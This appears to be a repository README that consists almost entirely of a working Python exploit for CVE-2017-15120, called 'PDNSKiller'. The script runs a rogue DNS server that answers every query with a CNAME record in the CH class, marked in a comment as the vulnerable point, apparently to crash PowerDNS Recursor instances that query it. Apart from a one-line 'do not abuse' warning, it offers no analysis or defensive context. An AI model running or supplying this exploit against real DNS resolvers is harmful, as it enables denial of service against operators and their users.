README.md
Rendering markdown...
#!/usr/local/bin/python3.6
#CVE-2017-15120 exploit.
#DO NOT ABUSE !!!
import socket
#pip install dnslib
from dnslib import RR, DNSHeader, DNSRecord, QTYPE, CNAME, CLASS
class PDNSKiller():
def __init__(self, ipaddr):
self.host = ipaddr
self.port = 53
def run(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((self.host, self.port))
print("PDNS Killer Started.")
while True:
msg, (cliHost, cliPort) = sock.recvfrom(8096)
print("Received DNS Packet. Client:" + str(cliHost) + ":" + str(cliPort))
responseData = self.craftPayload(msg)
if responseData is not None:
sock.sendto(responseData, (cliHost, cliPort))
def craftPayload(self, msg):
query = DNSRecord.parse(msg)
response = query.reply()
qname = self.getQname(query)
cnamerr = RR(qname, QTYPE.CNAME, ttl=60, rdata=CNAME("example.com."))
#vuln point.
cnamerr.rclass = CLASS.CH
response.add_answer(cnamerr)
if response.__class__.__name__ == "DNSRecord":
print("===============================")
print(response)
print("===============================")
return response.pack()
else:
return None
def getQname(self, query):
return str(query.q.qname)
if __name__ == '__main__':
srv = PDNSKiller("0.0.0.0")
srv.run()